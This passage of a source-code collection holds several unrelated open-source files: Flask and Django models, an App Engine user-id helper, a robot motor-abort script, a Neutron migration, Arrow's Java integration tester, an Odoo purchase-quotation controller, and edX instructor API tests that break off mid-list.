('[@ note there is no trailing bracket', set()),
])
def test_find_signatures(content, expected):
assert find_signatures(content) == expected
| mpl-2.0 |
evereux/flask_template | application/models.py | 1 | 2773 | import datetime
from application import db
from config import admin_group_name
Base = db.Model
username_maxlength = 24
name_maxlength = 60
email_maxlength = 24
group_maxlength = 64
groups = db.Table('groups',
db.Column('user_id', db.Integer, db.ForeignKey('users.id')),
db.Column('group_id', db.Integer, db.ForeignKey('group.id'))
)
class User(Base):
# defines tablename as it will be create in SQL
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(username_maxlength), index=True, unique=True)
name = db.Column(db.String(name_maxlength))
password = db.Column(db.LargeBinary(60))
email = db.Column(db.String(email_maxlength), unique=True)
date_added = db.Column(db.DateTime)
date_modified = db.Column(db.DateTime, onupdate=datetime.datetime.now)
def __init__(self, username, name, email, password):
self.username = username
self.name = name
self.password = password
self.email = email
def __repr__(self):
return '<User {}>'.format(self.username)
@property
def is_authenticated(self):
return True
@property
def is_active(self):
return True
@property
def is_anonymous(self):
return False
@property
def is_admin(self):
""" returns true if the user is a member of the 'admin' group"""
user = User.query.filter_by(id = self.id).first()
for g in user.groups:
if g.group_name == admin_group_name:
return True
def get_id(self):
return str(self.id)
class Group(Base):
id = db.Column(db.Integer, primary_key=True)
group_name = db.Column(db.String(group_maxlength))
users = db.relationship('User',
secondary=groups,
backref=db.backref('groups',
lazy='dynamic',
order_by=group_name
)
)
# this is for when a group has many groups
# ie everyone in group 'admin' can be a member of group 'all'
# parents = db.relationship('Group',
# secondary=group_to_group,
# primaryjoin=id==group_to_group.c.parent_id,
# secondaryjoin=id==group_to_group.c.child_id,
# backref="children",
# remote_side=[group_to_group.c.parent_id])
def __init__(self, group_name):
self.group_name = group_name
@property
def __repr__(self):
return self.group_name
| mit |
robertkohl125/ConferenceCentral | utils.py | 384 | 1576 | import json
import os
import time
import uuid
from google.appengine.api import urlfetch
from models import Profile
def getUserId(user, id_type="email"):
if id_type == "email":
return user.email()
if id_type == "oauth":
"""A workaround implementation for getting userid."""
auth = os.getenv('HTTP_AUTHORIZATION')
bearer, token = auth.split()
token_type = 'id_token'
if 'OAUTH_USER_ID' in os.environ:
token_type = 'access_token'
url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?%s=%s'
% (token_type, token))
user = {}
wait = 1
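# retry the tokeninfo lookup up to three times, growing the wait between attempts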
for i in range(3):
resp = urlfetch.fetch(url)
if resp.status_code == 200:
user = json.loads(resp.content)
break
elif resp.status_code == 400 and 'invalid_token' in resp.content:
url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?%s=%s'
% ('access_token', token))
else:
time.sleep(wait)
wait = wait + i
return user.get('user_id', '')
if id_type == "custom":
# implement your own user_id creation and getting algorithm
# this is just a sample that queries datastore for an existing profile
# and generates an id if profile does not exist for an email
# NOTE: the original referenced an undefined Conference model; Profile is
# what this module actually imports (a mainEmail field is assumed on it)
profile = Profile.query(Profile.mainEmail == user.email()).get()
if profile:
return profile.key.id()
else:
return str(uuid.uuid1().get_hex())
| apache-2.0 |
gbwebdev/PFE-VA_Dev | components/abort.py | 2 | 3363 | """
abort.py
Abort all operations
"""
#!/usr/bin/python3.5
#-*- coding: utf-8 -*-
###Standard imports :
#import atexit
from os import path
###Specific imports :
##robotBasics:
#Constants:
from robotBasics.constants import gpiodef as GPIODEF
from robotBasics.constants.gpiodef import LEDS as LEDS_GPIO
from robotBasics.constants.gpiodef import LEDS_PINS as LEDS_PINS
#Classes & Methods:
from robotBasics.logger import robotLogger
###########################################################################
# Environment Setup : #
###########################################################################
#If we are on an actual robot :
if path.isdir("/home/robot"):
ROBOT_ROOT = '/home/robot/'
import Adafruit_BBIO.GPIO as GPIO
import Adafruit_BBIO.PWM as PWM
elif path.isfile(path.expanduser('~/.robotConf')):
#If we're not on an actual robot, check if we have
#a working environment set for robot debugging:
CONFIG_FILE = open(path.expanduser('~/.robotConf'), 'r')
ROBOT_ROOT = CONFIG_FILE.read().strip()
CONFIG_FILE.close()
import Adafruit_BBIO_SIM.GPIO as GPIO
import Adafruit_BBIO_SIM.PWM as PWM  # simulator PWM (the real module lacks the pin_association/setup_behavior calls used below)
#Simulator setup
PWM.pin_association(GPIODEF.ENGINES["left"]["PWM"], 'left motor\'s PWM')
PWM.pin_association(GPIODEF.ENGINES["right"]["PWM"], 'right motor\'s PWM')
GPIO.pin_association(GPIODEF.ENGINES["left"]["forward"], 'left motor\'s forward pin')
GPIO.pin_association(GPIODEF.ENGINES["right"]["forward"], 'right motor\'s forward pin')
GPIO.pin_association(GPIODEF.ENGINES["left"]["backward"], 'left motor\'s backward pin')
GPIO.pin_association(GPIODEF.ENGINES["right"]["backward"], 'right motor\'s backward pin')
GPIO.setup_behavior('print')
PWM.setup_behavior('print')
else:
ROBOT_ROOT = ''
print('It seems like you are NOT working on an actual robot. \
You should set up a debugging environment before running any code (see documentation)')
#Logging Initialization :
LOGGER = robotLogger("abort", ROBOT_ROOT+'logs/')
###########################################################################
# I/O Initialization : #
###########################################################################
LOGGER.debug('Aborting')
MOTOR_LEFT = GPIODEF.ENGINES["left"]
MOTOR_RIGHT = GPIODEF.ENGINES["right"]
LOGGER.debug('Stopping motors')
#Start PWM with a 0% duty cycle
PWM.start(MOTOR_LEFT["PWM"], 0)
PWM.start(MOTOR_RIGHT["PWM"], 0)
#Declare motor enabling pins as outputs
GPIO.setup(MOTOR_LEFT["forward"], GPIO.OUT)
GPIO.setup(MOTOR_RIGHT["forward"], GPIO.OUT)
GPIO.setup(MOTOR_LEFT["backward"], GPIO.OUT)
GPIO.setup(MOTOR_RIGHT["backward"], GPIO.OUT)
#Set enabling pins to LOW
########### NOTE ############
# To go forward : set forward pin to 1 and backward pin to 0
# To go backward : set backward pin to 1 and forward pin to 0
GPIO.output(MOTOR_LEFT["forward"], GPIO.LOW)
GPIO.output(MOTOR_RIGHT["forward"], GPIO.LOW)
GPIO.output(MOTOR_LEFT["backward"], GPIO.LOW)
GPIO.output(MOTOR_RIGHT["backward"], GPIO.LOW)
LOGGER.debug('Turning LEDs down')
for LED in LEDS_PINS:
#Declare motor enabling pins as outputs
GPIO.setup(LED, GPIO.OUT)
#Set pins to HIGH (LEDs off)
GPIO.output(LED, GPIO.HIGH)
LOGGER.debug('Abort successful')
| gpl-3.0 |
cernops/neutron | neutron/db/migration/alembic_migrations/versions/icehouse_release.py | 17 | 1406 | # Copyright 2014 Yahoo! Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""icehouse
Revision ID: icehouse
Revises: 5ac1c354a051
Create Date: 2013-03-28 00:00:00.000000
"""
# revision identifiers, used by Alembic.
revision = 'icehouse'
down_revision = '5ac1c354a051'
def upgrade():
"""A no-op migration for marking the Icehouse release."""
pass
def downgrade():
# We are purging all downgrade methods from icehouse to havana because:
# 1) havana is going to become unsupported during Kilo cycle.
# 2) most people will upgrade from icehouse, while a minor percentage
# from havana
# 3) downgrade use cases are mostly to revert after failed upgrades
# See discussion in https://review.openstack.org/109952 for details
raise NotImplementedError("Downgrade from icehouse to havana not "
"supported")
| apache-2.0 |
ulope/django | tests/model_fields/models.py | 21 | 9803 | import os
import tempfile
import uuid
import warnings
try:
from PIL import Image
except ImportError:
Image = None
from django.core.files.storage import FileSystemStorage
from django.db import models
from django.db.models.fields.files import ImageFieldFile, ImageField
from django.utils import six
class Foo(models.Model):
a = models.CharField(max_length=10)
d = models.DecimalField(max_digits=5, decimal_places=3)
def get_foo():
return Foo.objects.get(id=1)
class Bar(models.Model):
b = models.CharField(max_length=10)
a = models.ForeignKey(Foo, default=get_foo)
class Whiz(models.Model):
CHOICES = (
('Group 1', (
(1, 'First'),
(2, 'Second'),
)
),
('Group 2', (
(3, 'Third'),
(4, 'Fourth'),
)
),
(0, 'Other'),
)
c = models.IntegerField(choices=CHOICES, null=True)
class Counter(six.Iterator):
def __init__(self):
self.n = 1
def __iter__(self):
return self
def __next__(self):
if self.n > 5:
raise StopIteration
else:
self.n += 1
return (self.n, 'val-' + str(self.n))
class WhizIter(models.Model):
c = models.IntegerField(choices=Counter(), null=True)
class WhizIterEmpty(models.Model):
c = models.CharField(choices=(x for x in []), blank=True, max_length=1)
class BigD(models.Model):
d = models.DecimalField(max_digits=38, decimal_places=30)
class FloatModel(models.Model):
size = models.FloatField()
class BigS(models.Model):
s = models.SlugField(max_length=255)
class SmallIntegerModel(models.Model):
value = models.SmallIntegerField()
class IntegerModel(models.Model):
value = models.IntegerField()
class BigIntegerModel(models.Model):
value = models.BigIntegerField()
null_value = models.BigIntegerField(null=True, blank=True)
class PositiveSmallIntegerModel(models.Model):
value = models.PositiveSmallIntegerField()
class PositiveIntegerModel(models.Model):
value = models.PositiveIntegerField()
class Post(models.Model):
title = models.CharField(max_length=100)
body = models.TextField()
class NullBooleanModel(models.Model):
nbfield = models.NullBooleanField()
class BooleanModel(models.Model):
bfield = models.BooleanField(default=None)
string = models.CharField(max_length=10, default='abc')
class DateTimeModel(models.Model):
d = models.DateField()
dt = models.DateTimeField()
t = models.TimeField()
class PrimaryKeyCharModel(models.Model):
string = models.CharField(max_length=10, primary_key=True)
class FksToBooleans(models.Model):
"""Model with FKs to models with {Null,}BooleanField's, #15040"""
bf = models.ForeignKey(BooleanModel)
nbf = models.ForeignKey(NullBooleanModel)
class FkToChar(models.Model):
"""Model with FK to a model with a CharField primary key, #19299"""
out = models.ForeignKey(PrimaryKeyCharModel)
class RenamedField(models.Model):
modelname = models.IntegerField(name="fieldname", choices=((1, 'One'),))
class VerboseNameField(models.Model):
id = models.AutoField("verbose pk", primary_key=True)
field1 = models.BigIntegerField("verbose field1")
field2 = models.BooleanField("verbose field2", default=False)
field3 = models.CharField("verbose field3", max_length=10)
field4 = models.CommaSeparatedIntegerField("verbose field4", max_length=99)
field5 = models.DateField("verbose field5")
field6 = models.DateTimeField("verbose field6")
field7 = models.DecimalField("verbose field7", max_digits=6, decimal_places=1)
field8 = models.EmailField("verbose field8")
field9 = models.FileField("verbose field9", upload_to="unused")
field10 = models.FilePathField("verbose field10")
field11 = models.FloatField("verbose field11")
# Don't want to depend on Pillow in this test
#field_image = models.ImageField("verbose field")
field12 = models.IntegerField("verbose field12")
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
field13 = models.IPAddressField("verbose field13")
field14 = models.GenericIPAddressField("verbose field14", protocol="ipv4")
field15 = models.NullBooleanField("verbose field15")
field16 = models.PositiveIntegerField("verbose field16")
field17 = models.PositiveSmallIntegerField("verbose field17")
field18 = models.SlugField("verbose field18")
field19 = models.SmallIntegerField("verbose field19")
field20 = models.TextField("verbose field20")
field21 = models.TimeField("verbose field21")
field22 = models.URLField("verbose field22")
###############################################################################
# These models aren't used in any test, just here to ensure they validate
# successfully.
# See ticket #16570.
class DecimalLessThanOne(models.Model):
d = models.DecimalField(max_digits=3, decimal_places=3)
# See ticket #18389.
class FieldClassAttributeModel(models.Model):
field_class = models.CharField
###############################################################################
class DataModel(models.Model):
short_data = models.BinaryField(max_length=10, default=b'\x08')
data = models.BinaryField()
###############################################################################
# FileField
class Document(models.Model):
myfile = models.FileField(upload_to='unused')
###############################################################################
# ImageField
# If Pillow available, do these tests.
if Image:
class TestImageFieldFile(ImageFieldFile):
"""
Custom Field File class that records whether or not the underlying file
was opened.
"""
def __init__(self, *args, **kwargs):
self.was_opened = False
super(TestImageFieldFile, self).__init__(*args, **kwargs)
def open(self):
self.was_opened = True
super(TestImageFieldFile, self).open()
class TestImageField(ImageField):
attr_class = TestImageFieldFile
# Set up a temp directory for file storage.
temp_storage_dir = tempfile.mkdtemp(dir=os.environ['DJANGO_TEST_TEMP_DIR'])
temp_storage = FileSystemStorage(temp_storage_dir)
temp_upload_to_dir = os.path.join(temp_storage.location, 'tests')
class Person(models.Model):
"""
Model that defines an ImageField with no dimension fields.
"""
name = models.CharField(max_length=50)
mugshot = TestImageField(storage=temp_storage, upload_to='tests')
class AbstractPersonWithHeight(models.Model):
"""
Abstract model that defines an ImageField with only one dimension field
to make sure the dimension update is correctly run on concrete subclass
instances post-initialization.
"""
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height')
mugshot_height = models.PositiveSmallIntegerField()
class Meta:
abstract = True
class PersonWithHeight(AbstractPersonWithHeight):
"""
Concrete model that subclasses an abstract one with only one dimension
field.
"""
name = models.CharField(max_length=50)
class PersonWithHeightAndWidth(models.Model):
"""
Model that defines height and width fields after the ImageField.
"""
name = models.CharField(max_length=50)
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
class PersonDimensionsFirst(models.Model):
"""
Model that defines height and width fields before the ImageField.
"""
name = models.CharField(max_length=50)
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
class PersonTwoImages(models.Model):
"""
Model that:
* Defines two ImageFields
* Defines the height/width fields before the ImageFields
* Has a nullable ImageField
"""
name = models.CharField(max_length=50)
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
headshot_height = models.PositiveSmallIntegerField(
blank=True, null=True)
headshot_width = models.PositiveSmallIntegerField(
blank=True, null=True)
headshot = TestImageField(blank=True, null=True,
storage=temp_storage, upload_to='tests',
height_field='headshot_height',
width_field='headshot_width')
###############################################################################
class UUIDModel(models.Model):
field = models.UUIDField()
class NullableUUIDModel(models.Model):
field = models.UUIDField(blank=True, null=True)
class PrimaryKeyUUIDModel(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4)
| bsd-3-clause |
xhochy/arrow | dev/archery/archery/integration/tester_java.py | 6 | 5151 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import contextlib
import os
import subprocess
from .tester import Tester
from .util import run_cmd, ARROW_ROOT_DEFAULT, log
def load_version_from_pom():
import xml.etree.ElementTree as ET
tree = ET.parse(os.path.join(ARROW_ROOT_DEFAULT, 'java', 'pom.xml'))
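# Maven POM elements live in the POM 4.0.0 XML namespace, so lookups need the fully qualified tag name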
tag_pattern = '{http://maven.apache.org/POM/4.0.0}version'
version_tag = list(tree.getroot().findall(tag_pattern))[0]
return version_tag.text
class JavaTester(Tester):
PRODUCER = True
CONSUMER = True
FLIGHT_SERVER = True
FLIGHT_CLIENT = True
JAVA_OPTS = ['-Dio.netty.tryReflectionSetAccessible=true',
'-Darrow.struct.conflict.policy=CONFLICT_APPEND']
_arrow_version = load_version_from_pom()
ARROW_TOOLS_JAR = os.environ.get(
'ARROW_JAVA_INTEGRATION_JAR',
os.path.join(ARROW_ROOT_DEFAULT,
'java/tools/target/arrow-tools-{}-'
'jar-with-dependencies.jar'.format(_arrow_version)))
ARROW_FLIGHT_JAR = os.environ.get(
'ARROW_FLIGHT_JAVA_INTEGRATION_JAR',
os.path.join(ARROW_ROOT_DEFAULT,
'java/flight/flight-core/target/flight-core-{}-'
'jar-with-dependencies.jar'.format(_arrow_version)))
ARROW_FLIGHT_SERVER = ('org.apache.arrow.flight.example.integration.'
'IntegrationTestServer')
ARROW_FLIGHT_CLIENT = ('org.apache.arrow.flight.example.integration.'
'IntegrationTestClient')
name = 'Java'
def _run(self, arrow_path=None, json_path=None, command='VALIDATE'):
cmd = ['java'] + self.JAVA_OPTS + \
['-cp', self.ARROW_TOOLS_JAR, 'org.apache.arrow.tools.Integration']
if arrow_path is not None:
cmd.extend(['-a', arrow_path])
if json_path is not None:
cmd.extend(['-j', json_path])
cmd.extend(['-c', command])
if self.debug:
log(' '.join(cmd))
run_cmd(cmd)
def validate(self, json_path, arrow_path):
return self._run(arrow_path, json_path, 'VALIDATE')
def json_to_file(self, json_path, arrow_path):
return self._run(arrow_path, json_path, 'JSON_TO_ARROW')
def stream_to_file(self, stream_path, file_path):
cmd = ['java'] + self.JAVA_OPTS + \
['-cp', self.ARROW_TOOLS_JAR,
'org.apache.arrow.tools.StreamToFile', stream_path, file_path]
if self.debug:
log(' '.join(cmd))
run_cmd(cmd)
def file_to_stream(self, file_path, stream_path):
cmd = ['java'] + self.JAVA_OPTS + \
['-cp', self.ARROW_TOOLS_JAR,
'org.apache.arrow.tools.FileToStream', file_path, stream_path]
if self.debug:
log(' '.join(cmd))
run_cmd(cmd)
def flight_request(self, port, json_path=None, scenario_name=None):
cmd = ['java'] + self.JAVA_OPTS + \
['-cp', self.ARROW_FLIGHT_JAR, self.ARROW_FLIGHT_CLIENT,
'-port', str(port)]
if json_path:
cmd.extend(('-j', json_path))
elif scenario_name:
cmd.extend(('-scenario', scenario_name))
else:
raise TypeError("Must provide one of json_path or scenario_name")
if self.debug:
log(' '.join(cmd))
run_cmd(cmd)
@contextlib.contextmanager
def flight_server(self, scenario_name=None):
cmd = ['java'] + self.JAVA_OPTS + \
['-cp', self.ARROW_FLIGHT_JAR, self.ARROW_FLIGHT_SERVER,
'-port', '0']
if scenario_name:
cmd.extend(('-scenario', scenario_name))
if self.debug:
log(' '.join(cmd))
server = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
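# the server prints "Server listening on localhost:<port>" once ready; parse the port from that line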
output = server.stdout.readline().decode()
if not output.startswith("Server listening on localhost:"):
server.kill()
out, err = server.communicate()
raise RuntimeError(
"Flight-Java server did not start properly, "
"stdout:\n{}\n\nstderr:\n{}\n"
.format(output + out.decode(), err.decode()))
port = int(output.split(":")[1])
yield port
finally:
server.kill()
server.wait(5)
| apache-2.0 |
bringsvor/bc_website_purchase | controllers/main.py | 1 | 11590 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import SUPERUSER_ID
from openerp.addons.web import http
from openerp.addons.web.http import request
import werkzeug
import datetime
import time
import logging
import base64
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class purchase_quote(http.Controller):
@http.route([
"/purchase/<int:order_id>",
"/purchase/<int:order_id>/<token>"
], type='http', auth="public", website=True)
def view(self, order_id, token=None, message=False, **post):
# use SUPERUSER_ID allow to access/view order for public user
# only if he knows the private token
user_obj = request.registry.get('res.users')
group_obj = request.registry.get('res.groups')
user = user_obj.browse(request.cr,token and SUPERUSER_ID or request.uid, request.uid)
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, token and SUPERUSER_ID or request.uid, order_id)
now = time.strftime('%Y-%m-%d')
"""
if token:
if token != order.access_token:
return request.website.render('website.404')
if request.session.get('view_quote',False)!=now:
request.session['view_quote'] = now
body=_('Quotation viewed by supplier ')
self.__message_post(body, order_id, type='comment')
"""
# if token is None and ( request.uid==user.id and user.active==False ):
if ( request.uid==user.id and user.active==False ):
if request.env.ref('web.login', False):
values = request.params.copy() or {}
values["redirect"] = "/purchase/%i" % (order_id);
return request.render('web.login', values)
# Checks groups
broker = False
# import pdb;pdb.set_trace()
for group_id in user.groups_id:
group = group_obj.browse(request.cr,token and SUPERUSER_ID or request.uid, group_id.id)
if group.name == 'Elmatica Broker':
broker = True
if not broker:
partner_id = user.partner_id.parent_id.id or user.partner_id.id
if partner_id and request.uid != SUPERUSER_ID:
if partner_id != order.partner_id.id:
return request.website.render('website.404')
else:
if request.uid != SUPERUSER_ID:
return request.website.render('website.404')
if request.session.get('view_quote',False)!=now:
request.session['view_quote'] = now
body=_('Quotation viewed by supplier')
self.__message_post(body, order_id, type='comment')
# If the supplier is viewing this, he has received it; and if he has received it, it must have been sent
order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'send_rfq', context=request.context)
days = 0
if order.validity_date:
days = (datetime.datetime.strptime(order.validity_date, '%Y-%m-%d') - datetime.datetime.now()).days + 1
values = {
'quotation': order,
'message': message and int(message) or False,
'option': bool(filter(lambda x: not x.line_id, order.options)),
'order_valid': (not order.validity_date) or (now <= order.validity_date),
'days_valid': max(days, 0)
}
return request.website.render('bc_website_purchase.po_quotation', values)
# @http.route(['/purchase/accept'], type='json', auth="public", website=True)
@http.route(['/purchase/<int:order_id>/<token>/accept'], type='http', auth="public", website=True)
def accept(self, order_id, token=None, signer=None, sign=None, **post):
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
if token != order.access_token:
return request.website.render('website.404')
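# decode the base64-encoded signature image into an attachment, when one was provided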
attachments=sign and [('signature.png', sign.decode('base64'))] or []
order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'bid_received', context=request.context)
message = _('RFQ signed by %s') % (signer,)
self.__message_post(message, order_id, type='comment', subtype='mt_comment', attachments=attachments)
return werkzeug.utils.redirect("/purchase/%s" % (order_id))
@http.route(['/purchase/<int:order_id>/<token>/decline'], type='http', auth="public", website=True)
def decline(self, order_id, token, **post):
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
if token != order.access_token:
return request.website.render('website.404')
request.registry.get('purchase.order').action_cancel(request.cr, SUPERUSER_ID, [order_id])
message = post.get('decline_message')
if message:
self.__message_post(message, order_id, type='comment', subtype='mt_comment')
return werkzeug.utils.redirect("/purchase/%s/%s?message=2" % (order_id, token))
@http.route(['/purchase/<int:order_id>/<token>/post'], type='http', auth="public", website=True)
def post(self, order_id, token, **post):
# use SUPERUSER_ID allow to access/view order for public user
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
message = post.get('comment')
ufile = post.get('attachment')
attachment_ids = []
kwargs = {}
if token != order.access_token:
return request.website.render('website.404')
if ufile:
Model = request.session.model('ir.attachment')
try:
data_attach = {
'name': ufile.filename,
'datas': base64.encodestring(ufile.read()),
'datas_fname': ufile.filename,
'res_model': 'purchase.order',
'res_id': int(order_id)
}
attachment_id = Model.create( data_attach, request.context)
args = {
'filename': ufile.filename,
'id': attachment_id
}
#attachment_ids.append((0, 0, data_attach))
attachment_ids.append(attachment_id)
kwargs = { 'attachment_ids': attachment_ids }
except Exception:
args = {'error': "Something horrible happened"}
_logger.exception("Fail to upload attachment %s" % ufile.filename)
return werkzeug.utils.redirect("/purchase/%s/%s?message=0" % (order_id, token))
if message:
self.__message_post(message, order_id, type='comment', subtype='mt_comment',**kwargs)
return werkzeug.utils.redirect("/purchase/%s/%s?message=1" % (order_id, token))
# def __message_post(self, message, order_id, type='comment', subtype=False, attachments=[]):
def __message_post(self, message, order_id, type='comment', subtype=False, **kwargs):
request.session.body = message
cr, uid, context = request.cr, request.uid, request.context
user = request.registry['res.users'].browse(cr, SUPERUSER_ID, uid, context=context)
if 'body' in request.session and request.session.body:
request.registry.get('purchase.order').message_post(cr, SUPERUSER_ID, order_id,
body=request.session.body,
type=type,
subtype=subtype,
author_id=user.partner_id.id,
context=context,
attachments=None,
parent_id=False,
subject=None,
content_subtype='html',
**kwargs
)
request.session.body = False
return True
@http.route(['/purchase/update_line'], type='json', auth="public", website=True)
# def update_line(self, update_data, **post):
def update_line(self, **post):
order_id = post['order_id']
post_length = len(post['line_id'])
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID or request.uid, order_id)
if order.state not in ('draft','sent'):
return False
# import pdb;pdb.set_trace()
for i in range(len(post['line_id'])):
line_id = post['line_id'][i]
try:
leadtime = post['leadtime'][i]
except:
leadtime = 0
pass
price_unit = post['price_unit'][i]
vals = {
'price_unit': price_unit,
'leadtime': leadtime,
}
line_id=int(line_id)
order_line_obj = request.registry.get('purchase.order.line')
order_line_obj.write(request.cr, SUPERUSER_ID, [line_id], vals, context=request.context)
order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'bid_received', context=request.context)
return True
@http.route(['/purchase/save'], type='json', auth="public", website=True)
def save(self, **post):
order_id = post['order_id']
post_length = len(post['line_id'])
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID or request.uid, order_id)
if order.state not in ('draft','sent','confirmed','approved'):
return False
for i in range(len(post['line_id'])):
line_id = post['line_id'][i]
#try:
# leadtime = post['leadtime'][i]
#except:
# leadtime = 0
# pass
if order.state in ('draft','sent'):
price_unit = post['price_unit'][i]
vals = {
'price_unit': price_unit,
# 'leadtime': leadtime,
}
else:
vals = {
'date_code': post['date_code'][i],
'units_shipped': post['units_shipped'][i],
'weight': post['weight'][i],
'collies': post['collies'][i],
'units_in_stock': post['units_in_stock'][i],
'lot_week': post['lot_week'][i],
'lot_year': post['lot_year'][i],
'batch_number': post['batch_number'][i],
'tracking_number': post['tracking_number'][i],
'date_code': post['date_code'][i],
'expiry_date': post['expiry_date'][i],
}
line_id=int(line_id)
order_line_obj = request.registry.get('purchase.order.line')
order_line_obj.write(request.cr, SUPERUSER_ID, [line_id], vals, context=request.context)
order_obj.write(request.cr,SUPERUSER_ID,[order_id],{'saved': True},context=request.context)
return True
@http.route(["/purchase/template/<model('purchase.quote.template'):quote>"], type='http', auth="user", website=True)
def template_view(self, quote, **post):
values = { 'template': quote }
return request.website.render('bc_website_purchase.po_template', values)
| agpl-3.0 |
praveen-pal/edx-platform | lms/djangoapps/instructor/tests/test_api.py | 5 | 34544 | """
Unit tests for instructor.api methods.
"""
# pylint: disable=E1111
import unittest
import json
from urllib import quote
from django.conf import settings
from django.test import TestCase
from nose.tools import raises
from mock import Mock, patch
from django.test.utils import override_settings
from django.core.urlresolvers import reverse
from django.http import HttpRequest, HttpResponse
from django.contrib.auth.models import User
from courseware.tests.modulestore_config import TEST_DATA_MIXED_MODULESTORE
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from courseware.tests.helpers import LoginEnrollmentTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from student.tests.factories import UserFactory, AdminFactory
from student.models import CourseEnrollment
from courseware.models import StudentModule
# modules which are mocked in test cases.
import instructor_task.api
from instructor.access import allow_access
import instructor.views.api
from instructor.views.api import (
_split_input_list, _msk_from_problem_urlname, common_exceptions_400)
from instructor_task.api_helper import AlreadyRunningError
@common_exceptions_400
def view_success(request): # pylint: disable=W0613
"A dummy view for testing that returns a simple HTTP response"
return HttpResponse('success')
@common_exceptions_400
def view_user_doesnotexist(request): # pylint: disable=W0613
"A dummy view that raises a User.DoesNotExist exception"
raise User.DoesNotExist()
@common_exceptions_400
def view_alreadyrunningerror(request): # pylint: disable=W0613
"A dummy view that raises an AlreadyRunningError exception"
raise AlreadyRunningError()
class TestCommonExceptions400(unittest.TestCase):
"""
Testing the common_exceptions_400 decorator.
"""
def setUp(self):
self.request = Mock(spec=HttpRequest)
self.request.META = {}
def test_happy_path(self):
resp = view_success(self.request)
self.assertEqual(resp.status_code, 200)
def test_user_doesnotexist(self):
self.request.is_ajax.return_value = False
resp = view_user_doesnotexist(self.request)
self.assertEqual(resp.status_code, 400)
self.assertIn("User does not exist", resp.content)
def test_user_doesnotexist_ajax(self):
self.request.is_ajax.return_value = True
resp = view_user_doesnotexist(self.request)
self.assertEqual(resp.status_code, 400)
result = json.loads(resp.content)
self.assertIn("User does not exist", result["error"])
def test_alreadyrunningerror(self):
self.request.is_ajax.return_value = False
resp = view_alreadyrunningerror(self.request)
self.assertEqual(resp.status_code, 400)
self.assertIn("Task is already running", resp.content)
def test_alreadyrunningerror_ajax(self):
self.request.is_ajax.return_value = True
resp = view_alreadyrunningerror(self.request)
self.assertEqual(resp.status_code, 400)
result = json.loads(resp.content)
self.assertIn("Task is already running", result["error"])
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestInstructorAPIDenyLevels(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Ensure that users cannot access endpoints they shouldn't be able to.
"""
def setUp(self):
self.user = UserFactory.create()
self.course = CourseFactory.create()
CourseEnrollment.enroll(self.user, self.course.id)
self.client.login(username=self.user.username, password='test')
def test_deny_students_update_enrollment(self):
url = reverse('students_update_enrollment', kwargs={'course_id': self.course.id})
response = self.client.get(url, {})
self.assertEqual(response.status_code, 403)
def test_staff_level(self):
"""
Ensure that an enrolled student can't access staff or instructor endpoints.
"""
staff_level_endpoints = [
'students_update_enrollment',
'modify_access',
'list_course_role_members',
'get_grading_config',
'get_students_features',
'get_distribution',
'get_student_progress_url',
'reset_student_attempts',
'rescore_problem',
